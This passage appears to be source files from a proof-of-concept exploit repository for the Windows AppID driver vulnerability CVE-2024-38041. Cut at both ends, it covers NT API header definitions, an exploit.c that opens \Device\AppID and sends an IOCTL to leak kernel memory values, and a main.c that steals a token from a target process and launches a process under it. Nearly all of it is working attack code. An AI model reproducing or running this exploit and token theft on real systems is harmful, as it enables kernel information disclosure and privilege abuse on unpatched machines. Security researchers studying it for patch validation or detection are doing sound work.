STATUS_NOT_ALL_ASSIGNED 262 12 | 13 | #define CHECK_STATUS(Msg, Status) if (ERROR_SUCCESS != (Status)) {wprintf(L"LINE %d: %s%lu\r\n", __LINE__, (Msg), (Status));} 14 | 15 | #define IOCTL 0x22A014 16 | 17 | typedef struct _BufferOut { 18 | unsigned long long field0; 19 | unsigned long long field1; 20 | unsigned long long field2; 21 | unsigned long long field3; 22 | unsigned long long field4; 23 | unsigned long long field5; 24 | } BufferOut; 25 | 26 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 27 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 28 | #define OBJ_CASE_INSENSITIVE 0x00000040L 29 | #define FILE_OPEN 0x00000001 30 | 31 | #define InitializeObjectAttributes( p, n, a, r, s, t ) { \ 32 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 33 | (p)->RootDirectory = r; \ 34 | (p)->Attributes = a; \ 35 | (p)->ObjectName = n; \ 36 | (p)->SecurityDescriptor = s; \ 37 | (p)->SecurityQualityOfService = t; \ 38 | } 39 | 40 | typedef enum _THREADINFOCLASS 41 | { 42 | ThreadImpersonationToken = 5 //Rust docs say so 43 | } THREADINFOCLASS; 44 | 45 | typedef enum _SYSTEM_INFORMATION_CLASS { 46 | SystemBasicInformation = 0, 47 | SystemProcessorInformation = 1, 48 | SystemPerformanceInformation = 2, 49 | SystemTimeOfDayInformation = 3, 50 | SystemPathInformation = 4, 51 | SystemProcessInformation = 5, 52 | SystemCallCountInformation = 6, 53 | SystemDeviceInformation = 7, 54 | SystemProcessorPerformanceInformation = 8, 55 | SystemFlagsInformation = 9, 56 | SystemCallTimeInformation = 10, 57 | SystemModuleInformation = 11, 58 | SystemLocksInformation = 12, 59 | SystemStackTraceInformation = 13, 60 | SystemPagedPoolInformation = 14, 61 | SystemNonPagedPoolInformation = 15, 62 | SystemHandleInformation = 16, 63 | SystemObjectInformation = 17, 64 | SystemPageFileInformation = 18, 65 | SystemVdmInstemulInformation = 19, 66 | SystemVdmBopInformation = 20, 67 | SystemFileCacheInformation = 21, 68 | SystemPoolTagInformation = 22, 69 | SystemInterruptInformation = 23, 70 | SystemDpcBehaviorInformation = 24, 71 | SystemFullMemoryInformation = 25, 72 | SystemLoadGdiDriverInformation = 26, 73 | SystemUnloadGdiDriverInformation = 27, 74 | SystemTimeAdjustmentInformation = 28, 75 | SystemSummaryMemoryInformation = 29, 76 | SystemMirrorMemoryInformation = 30, 77 | SystemPerformanceTraceInformation = 31, 78 | SystemObsolete0 = 32, 79 | SystemExceptionInformation = 33, 80 | SystemCrashDumpStateInformation = 34, 81 | SystemKernelDebuggerInformation = 35, 82 | SystemContextSwitchInformation = 36, 83 | SystemRegistryQuotaInformation = 37, 84 | SystemExtendServiceTableInformation = 38, 85 | SystemPrioritySeperation = 39, 86 | SystemVerifierAddDriverInformation = 40, 87 | SystemVerifierRemoveDriverInformation = 41, 88 | SystemProcessorIdleInformation = 42, 89 | SystemLegacyDriverInformation = 43, 90 | SystemCurrentTimeZoneInformation = 44, 91 | SystemLookasideInformation = 45, 92 | SystemTimeSlipNotification = 46, 93 | SystemSessionCreate = 47, 94 | SystemSessionDetach = 48, 95 | SystemSessionInformation = 49, 96 | SystemRangeStartInformation = 50, 97 | SystemVerifierInformation = 51, 98 | SystemVerifierThunkExtend = 52, 99 | SystemSessionProcessInformation = 53, 100 | SystemLoadGdiDriverInSystemSpace = 54, 101 | SystemNumaProcessorMap = 55, 102 | SystemPrefetcherInformation = 56, 103 | SystemExtendedProcessInformation = 57, 104 | SystemRecommendedSharedDataAlignment = 58, 105 | SystemComPlusPackage = 59, 106 | SystemNumaAvailableMemory = 60, 107 | SystemProcessorPowerInformation = 61, 108 | SystemEmulationBasicInformation = 62, 109 | SystemEmulationProcessorInformation = 63, 110 | SystemExtendedHandleInformation = 64, 111 | SystemLostDelayedWriteInformation = 65, 112 | SystemBigPoolInformation = 66, 113 | SystemSessionPoolTagInformation = 67, 114 | SystemSessionMappedViewInformation = 68, 115 | SystemHotpatchInformation = 69, 116 | SystemObjectSecurityMode = 70, 117 | SystemWatchdogTimerHandler = 71, 118 | SystemWatchdogTimerInformation = 72, 119 | SystemLogicalProcessorInformation = 73, 120 | SystemWow64SharedInformationObsolete = 74, 121 | SystemRegisterFirmwareTableInformationHandler = 75, 122 | SystemFirmwareTableInformation = 76, 123 | SystemModuleInformationEx = 77, 124 | SystemVerifierTriageInformation = 78, 125 | SystemSuperfetchInformation = 79, 126 | SystemMemoryListInformation = 80, 127 | SystemFileCacheInformationEx = 81, 128 | SystemThreadPriorityClientIdInformation = 82, 129 | SystemProcessorIdleCycleTimeInformation = 83, 130 | SystemVerifierCancellationInformation = 84, 131 | SystemProcessorPowerInformationEx = 85, 132 | SystemRefTraceInformation = 86, 133 | SystemSpecialPoolInformation = 87, 134 | SystemProcessIdInformation = 88, 135 | SystemErrorPortInformation = 89, 136 | SystemBootEnvironmentInformation = 90, 137 | SystemHypervisorInformation = 91, 138 | SystemVerifierInformationEx = 92, 139 | SystemTimeZoneInformation = 93, 140 | SystemImageFileExecutionOptionsInformation = 94, 141 | SystemCoverageInformation = 95, 142 | SystemPrefetchPatchInformation = 96, 143 | SystemVerifierFaultsInformation = 97, 144 | SystemSystemPartitionInformation = 98, 145 | SystemSystemDiskInformation = 99, 146 | SystemProcessorPerformanceDistribution = 100, 147 | SystemNumaProximityNodeInformation = 101, 148 | SystemDynamicTimeZoneInformation = 102, 149 | SystemCodeIntegrityInformation = 103, 150 | SystemProcessorMicrocodeUpdateInformation = 104, 151 | SystemProcessorBrandString = 105, 152 | SystemVirtualAddressInformation = 106, 153 | SystemLogicalProcessorAndGroupInformation = 107, 154 | SystemProcessorCycleTimeInformation = 108, 155 | SystemStoreInformation = 109, 156 | SystemRegistryAppendString = 110, 157 | SystemAitSamplingValue = 111, 158 | SystemVhdBootInformation = 112, 159 | SystemCpuQuotaInformation = 113, 160 | SystemNativeBasicInformation = 114, 161 | SystemErrorPortTimeouts = 115, 162 | SystemLowPriorityIoInformation = 116, 163 | SystemBootEntropyInformation = 117, 164 | SystemVerifierCountersInformation = 118, 165 | SystemPagedPoolInformationEx = 119, 166 | SystemSystemPtesInformationEx = 120, 167 | SystemNodeDistanceInformation = 121, 168 | SystemAcpiAuditInformation = 122, 169 | SystemBasicPerformanceInformation = 123, 170 | SystemQueryPerformanceCounterInformation = 124, 171 | SystemSessionBigPoolInformation = 125, 172 | SystemBootGraphicsInformation = 126, 173 | SystemScrubPhysicalMemoryInformation = 127, 174 | SystemBadPageInformation = 128, 175 | SystemProcessorProfileControlArea = 129, 176 | SystemCombinePhysicalMemoryInformation = 130, 177 | SystemEntropyInterruptTimingInformation = 131, 178 | SystemConsoleInformation = 132, 179 | SystemPlatformBinaryInformation = 133, 180 | SystemPolicyInformation = 134, 181 | SystemHypervisorProcessorCountInformation = 135, 182 | SystemDeviceDataInformation = 136, 183 | SystemDeviceDataEnumerationInformation = 137, 184 | SystemMemoryTopologyInformation = 138, 185 | SystemMemoryChannelInformation = 139, 186 | SystemBootLogoInformation = 140, 187 | SystemProcessorPerformanceInformationEx = 141, 188 | SystemCriticalProcessErrorLogInformation = 142, 189 | SystemSecureBootPolicyInformation = 143, 190 | SystemPageFileInformationEx = 144, 191 | SystemSecureBootInformation = 145, 192 | SystemEntropyInterruptTimingRawInformation = 146, 193 | SystemPortableWorkspaceEfiLauncherInformation = 147, 194 | SystemFullProcessInformation = 148, 195 | SystemKernelDebuggerInformationEx = 149, 196 | SystemBootMetadataInformation = 150, 197 | SystemSoftRebootInformation = 151, 198 | SystemElamCertificateInformation = 152, 199 | SystemOfflineDumpConfigInformation = 153, 200 | SystemProcessorFeaturesInformation = 154, 201 | SystemRegistryReconciliationInformation = 155, 202 | SystemEdidInformation = 156, 203 | SystemManufacturingInformation = 157, 204 | SystemEnergyEstimationConfigInformation = 158, 205 | SystemHypervisorDetailInformation = 159, 206 | SystemProcessorCycleStatsInformation = 160, 207 | SystemVmGenerationCountInformation = 161, 208 | SystemTrustedPlatformModuleInformation = 162, 209 | SystemKernelDebuggerFlags = 163, 210 | SystemCodeIntegrityPolicyInformation = 164, 211 | SystemIsolatedUserModeInformation = 165, 212 | SystemHardwareSecurityTestInterfaceResultsInformation = 166, 213 | SystemSingleModuleInformation = 167, 214 | SystemAllowedCpuSetsInformation = 168, 215 | SystemVsmProtectionInformation = 169, 216 | SystemInterruptCpuSetsInformation = 170, 217 | SystemSecureBootPolicyFullInformation = 171, 218 | SystemCodeIntegrityPolicyFullInformation = 172, 219 | SystemAffinitizedInterruptProcessorInformation = 173, 220 | SystemRootSiloInformation = 174, 221 | SystemCpuSetInformation = 175, 222 | SystemCpuSetTagInformation = 176, 223 | SystemWin32WerStartCallout = 177, 224 | SystemSecureKernelProfileInformation = 178, 225 | SystemCodeIntegrityPlatformManifestInformation = 179, 226 | SystemInterruptSteeringInformation = 180, 227 | SystemSupportedProcessorArchitectures = 181, 228 | SystemMemoryUsageInformation = 182, 229 | SystemCodeIntegrityCertificateInformation = 183, 230 | SystemPhysicalMemoryInformation = 184, 231 | SystemControlFlowTransition = 185, 232 | SystemKernelDebuggingAllowed = 186, 233 | SystemActivityModerationExeState = 187, 234 | SystemActivityModerationUserSettings = 188, 235 | SystemCodeIntegrityPoliciesFullInformation = 189, 236 | SystemCodeIntegrityUnlockInformation = 190, 237 | SystemIntegrityQuotaInformation = 191, 238 | SystemFlushInformation = 192, 239 | SystemProcessorIdleMaskInformation = 193, 240 | SystemSecureDumpEncryptionInformation = 194, 241 | SystemWriteConstraintInformation = 195, 242 | SystemKernelVaShadowInformation = 196, 243 | SystemHypervisorSharedPageInformation = 197, 244 | SystemFirmwareBootPerformanceInformation = 198, 245 | SystemCodeIntegrityVerificationInformation = 199, 246 | SystemFirmwarePartitionInformation = 200, 247 | SystemSpeculationControlInformation = 201, 248 | SystemDmaGuardPolicyInformation = 202, 249 | SystemEnclaveLaunchControlInformation = 203, 250 | SystemWorkloadAllowedCpuSetsInformation = 204, 251 | SystemCodeIntegrityUnlockModeInformation = 205, 252 | SystemLeapSecondInformation = 206, 253 | SystemFlags2Information = 207, 254 | SystemSecurityModelInformation = 208, 255 | SystemCodeIntegritySyntheticCacheInformation = 209, 256 | SystemFeatureConfigurationInformation = 210, 257 | SystemFeatureConfigurationSectionInformation = 211, 258 | SystemFeatureUsageSubscriptionInformation = 212, 259 | SystemSecureSpeculationControlInformation = 213, 260 | SystemSpacesBootInformation = 214, 261 | SystemFwRamdiskInformation = 215, 262 | SystemWheaIpmiHardwareInformation = 216, 263 | SystemDifSetRuleClassInformation = 217, 264 | SystemDifClearRuleClassInformation = 218, 265 | SystemDifApplyPluginVerificationOnDriver = 219, 266 | SystemDifRemovePluginVerificationOnDriver = 220, 267 | SystemShadowStackInformation = 221, 268 | SystemBuildVersionInformation = 222, 269 | SystemPoolLimitInformation = 223, 270 | SystemCodeIntegrityAddDynamicStore = 224, 271 | SystemCodeIntegrityClearDynamicStores = 225, 272 | SystemDifPoolTrackingInformation = 226, 273 | SystemPoolZeroingInformation = 227, 274 | SystemDpcWatchdogInformation = 228, 275 | SystemDpcWatchdogInformation2 = 229, 276 | SystemSupportedProcessorArchitectures2 = 230, 277 | SystemSingleProcessorRelationshipInformation = 231, 278 | SystemXfgCheckFailureInformation = 232, 279 | SystemIommuStateInformation = 233, 280 | SystemHypervisorMinrootInformation = 234, 281 | SystemHypervisorBootPagesInformation = 235, 282 | SystemPointerAuthInformation = 236, 283 | SystemSecureKernelDebuggerInformation = 237, 284 | SystemOriginalImageFeatureInformation = 238, 285 | MaxSystemInfoClass = 239 286 | } SYSTEM_INFORMATION_CLASS; 287 | 288 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO 289 | { 290 | unsigned short UniqueProcessId; 291 | unsigned short CreatorBackTraceIndex; 292 | unsigned char ObjectTypeIndex; 293 | unsigned char HandleAttributes; 294 | unsigned short HandleValue; 295 | void* Object; 296 | unsigned long GrantedAccess; 297 | long __PADDING__[1]; 298 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 299 | 300 | typedef struct _SYSTEM_HANDLE_INFORMATION 301 | { 302 | ULONG NumberOfHandles; 303 | struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; 304 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; 305 | 306 | typedef struct SYSTEM_MODULE { 307 | ULONG Reserved1; 308 | ULONG Reserved2; 309 | #ifdef _WIN64 310 | ULONG Reserved3; 311 | #endif 312 | PVOID ImageBaseAddress; 313 | ULONG ImageSize; 314 | ULONG Flags; 315 | WORD Id; 316 | WORD Rank; 317 | WORD w018; 318 | WORD NameOffset; 319 | CHAR Name[255]; 320 | }SYSTEM_MODULE, * PSYSTEM_MODULE; 321 | 322 | typedef struct SYSTEM_MODULE_INFORMATION { 323 | ULONG ModulesCount; 324 | SYSTEM_MODULE Modules[1]; 325 | } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; 326 | 327 | typedef struct _UNICODE_STRING { 328 | USHORT Length; 329 | USHORT MaximumLength; 330 | PWSTR Buffer; 331 | } UNICODE_STRING, * PUNICODE_STRING; 332 | 333 | typedef struct _OBJECT_ATTRIBUTES 334 | { 335 | ULONG Length; 336 | HANDLE RootDirectory; 337 | PUNICODE_STRING ObjectName; 338 | ULONG Attributes; 339 | PVOID SecurityDescriptor; 340 | PVOID SecurityQualityOfService; 341 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 342 | 343 | typedef struct _IO_STATUS_BLOCK 344 | { 345 | union 346 | { 347 | NTSTATUS Status; 348 | PVOID Pointer; 349 | }; 350 | ULONG_PTR Information; 351 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 352 | 353 | typedef struct _CLIENT_ID 354 | { 355 | HANDLE UniqueProcess; 356 | HANDLE UniqueThread; 357 | } CLIENT_ID, * PCLIENT_ID; 358 | 359 | typedef 360 | VOID 361 | (NTAPI* PIO_APC_ROUTINE) ( 362 | IN PVOID ApcContext, 363 | IN PIO_STATUS_BLOCK IoStatusBlock, 364 | IN ULONG Reserved 365 | ); 366 | 367 | typedef NTSTATUS(NTAPI* pNtOpenProcessToken)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle); 368 | typedef NTSTATUS(NTAPI* pNtAdjustPrivilegesToken)(HANDLE TokenHandle, BOOLEAN DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, ULONG BufferLength, PTOKEN_PRIVILEGES PreviousState, PULONG ReturnLength); 369 | typedef NTSTATUS(NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 370 | typedef NTSTATUS(NTAPI* pNtDuplicateToken)(HANDLE ExistingTokenHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, BOOLEAN EffectiveOnly, TOKEN_TYPE TokenType, PHANDLE NewTokenHandle); 371 | typedef NTSTATUS(NTAPI* pNtSetInformationThread)(HANDLE ThreadHandle, THREADINFOCLASS ThreadInformationClass, PVOID ThreadInformation, ULONG ThreadInformationLength); 372 | typedef NTSTATUS(NTAPI* pNtQueryInformationToken)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID TokenInformation, ULONG TokenInformationLength, PULONG ReturnLength); 373 | typedef NTSTATUS(NTAPI* pNtClose)(HANDLE Handle); 374 | 375 | typedef NTSTATUS(NTAPI* pRtlGetVersion)(LPOSVERSIONINFOEXW lpVersionInformation); 376 | 377 | typedef NTSTATUS(NTAPI* pNtDeviceIoControlFile)( 378 | _In_ HANDLE FileHandle, 379 | _In_opt_ HANDLE Event, 380 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 381 | _In_opt_ PVOID ApcContext, 382 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 383 | _In_ ULONG IoControlCode, 384 | _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, 385 | _In_ ULONG InputBufferLength, 386 | _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, 387 | _In_ ULONG OutputBufferLength 388 | ); 389 | 390 | typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)( 391 | HANDLE ProcessHandle, 392 | PVOID BaseAddress, 393 | PVOID Buffer, 394 | ULONG NumberOfBytesToWrite, 395 | PULONG NumberOfBytesWritten 396 | ); 397 | 398 | typedef NTSTATUS(NTAPI* pNtCreateFile)( 399 | _Out_ PHANDLE FileHandle, 400 | _In_ ACCESS_MASK DesiredAccess, 401 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 402 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 403 | _In_opt_ PLARGE_INTEGER AllocationSize, 404 | _In_ ULONG FileAttributes, 405 | _In_ ULONG ShareAccess, 406 | _In_ ULONG CreateDisposition, 407 | _In_ ULONG CreateOptions, 408 | _In_reads_bytes_opt_(EaLength) PVOID EaBuffer, 409 | _In_ ULONG EaLength 410 | ); 411 | 412 | typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)( 413 | __in SYSTEM_INFORMATION_CLASS SystemInformationClass, 414 | __inout PVOID SystemInformation, 415 | __in ULONG SystemInformationLength, 416 | __out_opt PULONG ReturnLength 417 | ); 418 | 419 | typedef VOID(NTAPI* pRtlInitUnicodeString)( 420 | _Out_ PUNICODE_STRING DestinationString, 421 | _In_opt_z_ PCWSTR SourceString 422 | ); 423 | 424 | extern pNtAdjustPrivilegesToken NtAdjustPrivilegesToken; 425 | extern pNtOpenProcessToken NtOpenProcessToken; 426 | extern pNtWriteVirtualMemory NtWriteVirtualMemory; 427 | extern pNtOpenProcess NtOpenProcess; 428 | extern pNtDuplicateToken NtDuplicateToken; 429 | extern pNtSetInformationThread NtSetInformationThread; 430 | extern pNtQueryInformationToken NtQueryInformationToken; 431 | extern pNtClose NtClose; 432 | extern pNtDeviceIoControlFile NtDeviceIoControlFile; 433 | extern pNtCreateFile NtCreateFile; 434 | extern pNtQuerySystemInformation NtQuerySystemInformation; 435 | extern pRtlInitUnicodeString RtlInitUnicodeString; 436 | extern pRtlGetVersion RtlGetVersion; -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/exploit.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | 3 | int SendRequest(HANDLE hDevice, PVOID buffer, size_t bufferLen) 4 | { 5 | IO_STATUS_BLOCK ioStatus; 6 | NTSTATUS status; 7 | 8 | status = NtDeviceIoControlFile(hDevice, NULL, NULL, NULL, &ioStatus, IOCTL, NULL, NULL, buffer, bufferLen); 9 | 10 | if (status == NOERROR) 11 | { 12 | return 1; 13 | } 14 | else 15 | { 16 | wprintf(L"[!] NtDeviceIoControlFile failed with 0x%X\n", status); 17 | return 0; 18 | } 19 | } 20 | 21 | int exploit() 22 | { 23 | NTSTATUS status; 24 | DWORD dwBytesReturned = 0; 25 | HANDLE hDevice = NULL; 26 | UNICODE_STRING deviceName; 27 | OBJECT_ATTRIBUTES objAttr; 28 | IO_STATUS_BLOCK ioStatus; 29 | RtlInitUnicodeString(&deviceName, L"\\Device\\AppID"); 30 | InitializeObjectAttributes(&objAttr, &deviceName, OBJ_CASE_INSENSITIVE, NULL, NULL, NULL); 31 | wprintf(L"[^] Trying to open a handle to %ws\n", deviceName.Buffer); 32 | status = NtCreateFile(&hDevice, GENERIC_READ | GENERIC_WRITE, 33 | &objAttr, &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL, 34 | FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0); 35 | 36 | if (status != 0) 37 | { 38 | wprintf(L"[!] Failed to open a handle to %ws (NTSTATUS code: 0x%X)\n", deviceName.Buffer, status); 39 | return -1; 40 | } 41 | 42 | wprintf(L"[+] Opened a handle successfully %p\n", hDevice); 43 | wprintf(L"[*] Sending the request to trigger the info leak\n"); 44 | 45 | size_t OutputBufferLength = sizeof(BufferOut); 46 | BufferOut OutputBuffer = { 0 }; 47 | 48 | if (SendRequest(hDevice, &OutputBuffer, OutputBufferLength)) 49 | { 50 | wprintf(L"[+] Sent the request successfully\n"); 51 | } 52 | else 53 | { 54 | wprintf(L"[!] Failed to send the request\n"); 55 | return -1; 56 | } 57 | 58 | printf("[*] Leaked Data:\nfield0 -> %llx\nfield1 -> %llx\nfield2 -> %llx\nfield3 -> %llx\nfield4 -> %llx\nfiedl5 -> %llx\n", 59 | OutputBuffer.field0, OutputBuffer.field1, OutputBuffer.field2, OutputBuffer.field3, OutputBuffer.field4, OutputBuffer.field5); 60 | 61 | wprintf(L"[+] Exploit Done!\n"); 62 | NtClose(hDevice); 63 | 64 | return 0; 65 | } -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "Common.h" 6 | 7 | pNtAdjustPrivilegesToken NtAdjustPrivilegesToken = NULL; 8 | pNtOpenProcessToken NtOpenProcessToken = NULL; 9 | pNtOpenProcess NtOpenProcess = NULL; 10 | pNtWriteVirtualMemory NtWriteVirtualMemory = NULL; 11 | pNtDuplicateToken NtDuplicateToken = NULL; 12 | pNtSetInformationThread NtSetInformationThread = NULL; 13 | pNtQueryInformationToken NtQueryInformationToken = NULL; 14 | pNtClose NtClose = NULL; 15 | pNtDeviceIoControlFile NtDeviceIoControlFile = NULL; 16 | pNtCreateFile NtCreateFile = NULL; 17 | pNtQuerySystemInformation NtQuerySystemInformation = NULL; 18 | pRtlInitUnicodeString RtlInitUnicodeString = NULL; 19 | pRtlGetVersion RtlGetVersion = NULL; 20 | 21 | HANDLE currentProcessHandle = ((HANDLE)(LONG_PTR)-1); 22 | HANDLE currentThreadHandle = ((HANDLE)(LONG_PTR)-2); 23 | 24 | void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid); 25 | 26 | int init_ntdll() 27 | { 28 | HMODULE hNtdll = GetModuleHandleW(L"ntdll"); 29 | if (hNtdll == NULL) 30 | { 31 | wprintf(L"[!] Failed to load ntdll.dll! (Error code: %d)\n", GetLastError()); 32 | return 0; 33 | } 34 | 35 | RtlGetVersion = (pRtlGetVersion)GetProcAddress(hNtdll, "RtlGetVersion"); 36 | NtAdjustPrivilegesToken = (pNtAdjustPrivilegesToken)GetProcAddress(hNtdll, "NtAdjustPrivilegesToken"); 37 | NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory"); 38 | NtOpenProcessToken = (pNtOpenProcessToken)GetProcAddress(hNtdll, "NtOpenProcessToken"); 39 | NtOpenProcess = (pNtOpenProcess)GetProcAddress(hNtdll, "NtOpenProcess"); 40 | NtDuplicateToken = (pNtDuplicateToken)GetProcAddress(hNtdll, "NtDuplicateToken"); 41 | NtSetInformationThread = (pNtSetInformationThread)GetProcAddress(hNtdll, "NtSetInformationThread"); 42 | NtQueryInformationToken = (pNtQueryInformationToken)GetProcAddress(hNtdll, "NtQueryInformationToken"); 43 | NtClose = (pNtClose)GetProcAddress(hNtdll, "NtClose"); 44 | 45 | NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"); 46 | RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString"); 47 | NtCreateFile = (pNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile"); 48 | NtDeviceIoControlFile = (pNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile"); 49 | 50 | if (!NtAdjustPrivilegesToken && !NtOpenProcess && !NtDuplicateToken && !NtOpenProcessToken 51 | && !NtSetInformationThread && !NtQueryInformationToken && !NtClose && 52 | !NtQuerySystemInformation && !RtlInitUnicodeString && !NtCreateFile && !NtDeviceIoControlFile && !RtlGetVersion && !NtWriteVirtualMemory) 53 | { 54 | wprintf(L"[!] Failed to resolve ntdll functions\n"); 55 | return 0; 56 | } 57 | 58 | return 1; 59 | } 60 | 61 | void spawnShell(HANDLE duplicatedTokenHandle, int64_t dwPid) 62 | { 63 | WCHAR selfPath[MAX_PATH] = { 0 }; 64 | if (!GetModuleFileNameW(NULL, selfPath, 100)) { 65 | wprintf(L"Failed to get module file name.\n"); 66 | return -1; 67 | } 68 | WCHAR cmdLine[MAX_PATH] = { 0 }; 69 | PROCESS_INFORMATION pi = { 0 }; 70 | STARTUPINFO si = { 0 }; 71 | 72 | if (dwPid != 0) 73 | { 74 | if (swprintf_s(cmdLine, MAX_PATH, L"%s %lld 0", selfPath, dwPid) == -1) { 75 | wprintf(L"ERROR: Failed to format command line.\n"); 76 | return -1; 77 | } 78 | } 79 | else 80 | { 81 | if (wcscpy_s(cmdLine, MAX_PATH, selfPath) != 0) { 82 | wprintf(L"ERROR: Failed to copy selfPath to cmdLine.\n"); 83 | return -1; 84 | } 85 | } 86 | 87 | // Set up STARTUPINFO 88 | si.cb = sizeof(si); 89 | si.lpDesktop = L"Winsta0\\Default"; 90 | si.dwFlags = STARTF_USESHOWWINDOW; 91 | si.wShowWindow = SW_SHOW; 92 | 93 | // This will fail with ACCESS_DENIED if the local service doesn't have the permissions to access the directory 94 | BOOL bResult = CreateProcessAsUserW( 95 | duplicatedTokenHandle, 96 | NULL, 97 | cmdLine, 98 | NULL, 99 | NULL, 100 | FALSE, 101 | 0, 102 | NULL, 103 | NULL, 104 | &si, 105 | &pi 106 | ); 107 | 108 | if (!bResult) { 109 | wprintf(L"CreateProcessAsUserW failed with error %ld\n", GetLastError()); 110 | } 111 | else { 112 | wprintf(L"Process created successfully.\n"); 113 | WaitForSingleObject(pi.hProcess, INFINITE); 114 | CloseHandle(pi.hProcess); 115 | CloseHandle(pi.hThread); 116 | } 117 | } 118 | 119 | BOOL IsRunningAsSystem() { 120 | HANDLE tokenHandle = NULL; 121 | NTSTATUS status; 122 | PTOKEN_USER pTokenUser = NULL; 123 | ULONG dwSize = 0; 124 | LPWSTR sidString = NULL; 125 | BOOL result = FALSE; 126 | 127 | status = NtOpenProcessToken(currentProcessHandle, TOKEN_QUERY, &tokenHandle); 128 | if (status != 0) { 129 | wprintf(L"NtOpenProcessToken failed. Status: 0x%x\n", status); 130 | return FALSE; 131 | } 132 | 133 | status = NtQueryInformationToken(tokenHandle, TokenUser, NULL, 0, &dwSize); 134 | if (status != 0xC0000023) { 135 | wprintf(L"NtQueryInformationToken (1) failed. Status: 0x%x\n", status); 136 | NtClose(tokenHandle); 137 | return FALSE; 138 | } 139 | 140 | pTokenUser = (PTOKEN_USER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize); 141 | if (!pTokenUser) { 142 | wprintf(L"HeapAlloc failed.\n"); 143 | NtClose(tokenHandle); 144 | return FALSE; 145 | } 146 | 147 | status = NtQueryInformationToken(tokenHandle, TokenUser, pTokenUser, dwSize, &dwSize); 148 | if (status != 0) { 149 | wprintf(L"NtQueryInformationToken (2) failed. Status: 0x%x\n", status); 150 | HeapFree(GetProcessHeap(), 0, pTokenUser); 151 | NtClose(tokenHandle); 152 | return FALSE; 153 | } 154 | 155 | if (!ConvertSidToStringSidW(pTokenUser->User.Sid, &sidString)) { 156 | wprintf(L"ConvertSidToStringSidW failed.\n"); 157 | HeapFree(GetProcessHeap(), 0, pTokenUser); 158 | NtClose(tokenHandle); 159 | return FALSE; 160 | } 161 | 162 | // NT AUTHORITY\LOCAL SERVICE 163 | if (_wcsicmp(sidString, L"S-1-5-19") == 0) { 164 | result = TRUE; 165 | } 166 | 167 | LocalFree(sidString); 168 | HeapFree(GetProcessHeap(), 0, pTokenUser); 169 | NtClose(tokenHandle); 170 | 171 | return result; 172 | } 173 | 174 | int wmain(int argc, wchar_t* argv[]) 175 | { 176 | if (!init_ntdll()) 177 | { 178 | return -1; 179 | } 180 | 181 | if (IsRunningAsSystem()) { 182 | wprintf(L"The process is running as NT AUTHORITY\\LOCAL SERVICE.\n"); 183 | exploit(); 184 | ExitProcess(0); 185 | } 186 | else { 187 | wprintf(L"The process is not running as NT AUTHORITY\\LOCAL SERVICE.\n"); 188 | 189 | if (3 != argc) 190 | { 191 | wprintf(L"Usage: %ls ", argv[0]); 192 | return -1; 193 | } 194 | 195 | HANDLE duplicatedTokenHandle = NULL; 196 | int64_t dwPid = 0; 197 | int64_t dwPid2 = 0; 198 | dwPid = _wtoi(argv[1]); 199 | dwPid2 = _wtoi(argv[2]); 200 | if (!dwPid && !dwPid2) 201 | { 202 | wprintf(L"PIDs must be numeric.\r\n"); 203 | return -2; 204 | } 205 | wprintf(L"[+] Stealing token from process #%lld.\r\n", dwPid); 206 | stealToken(&duplicatedTokenHandle, dwPid); 207 | if (!duplicatedTokenHandle) 208 | { 209 | wprintf(L"Token stealing failed.\r\n"); 210 | return -3; 211 | } 212 | spawnShell(duplicatedTokenHandle, dwPid2); 213 | } 214 | 215 | return 0; 216 | } 217 | 218 | void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid) 219 | { 220 | HANDLE targetProcessHandle = NULL; 221 | HANDLE duplicatedTokenHandle = NULL; 222 | HANDLE currentTokenHandle = NULL; 223 | NTSTATUS Status; 224 | TOKEN_PRIVILEGES tp; 225 | 226 | Status = NtOpenProcessToken(currentProcessHandle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ¤tTokenHandle); 227 | CHECK_STATUS(L"NtOpenProcessToken() returned ", Status); 228 | 229 | tp.PrivilegeCount = 1; 230 | 